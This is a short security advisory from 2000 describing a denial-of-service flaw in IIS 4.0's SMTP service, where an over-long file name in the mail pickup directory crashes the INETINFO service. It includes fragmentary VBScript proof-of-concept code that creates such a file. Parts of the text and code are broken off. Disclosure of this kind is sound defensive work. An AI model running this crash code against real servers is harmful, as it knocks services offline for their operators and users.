IIS 4 Denial of Service
Reported February 20, 2000 by valentijn
Internet Information Server 4.0 on NT 4.0 with STMP
It is possible to cause a denial of service
condition against IIS by manipulating file names within the SMTP service"s directory
structure. By creating a file name of more than 85 characters in length within the
"\mailroot\pickup" directory, the mail server will generate an error and crash
the INETINFO service, which supports IIS.
In addition, as long as the file remains in place IIS
cannot start up properly. To restore service the file must be removed.
This demonstration code runs on the server side, which
means you need a means to get the code on the server to begin with. This may imply a
rather low risk since its hard to get foreign code on to a remote server, but consider a
scenario that involves an ISP that routinely allows ASP code to be installed on
" PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"
Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
Thefile.writeline "X-Sender: [email protected]"
Thefile.writeline "X-Receiver: [email protected]"
Thefile.writeline "From: <[email protected]>"
Thefile.writeline "To: <[email protected]>"
Thefile.writeline "Subject: MINE DID NOT CRASH"
Thefile.writeline "Date: " & now()
Thefile.writeline "X-Generator: " & Thename
Set thefile = nothing
Thename = ""
for z = 1 to 80
a = Int((25 * Rnd) + 1)
password = password & chr(a+65)
Createkey = password
Microsoft is aware of this
issue, however no comment was available at the time of this writing.
Discovered by valentijn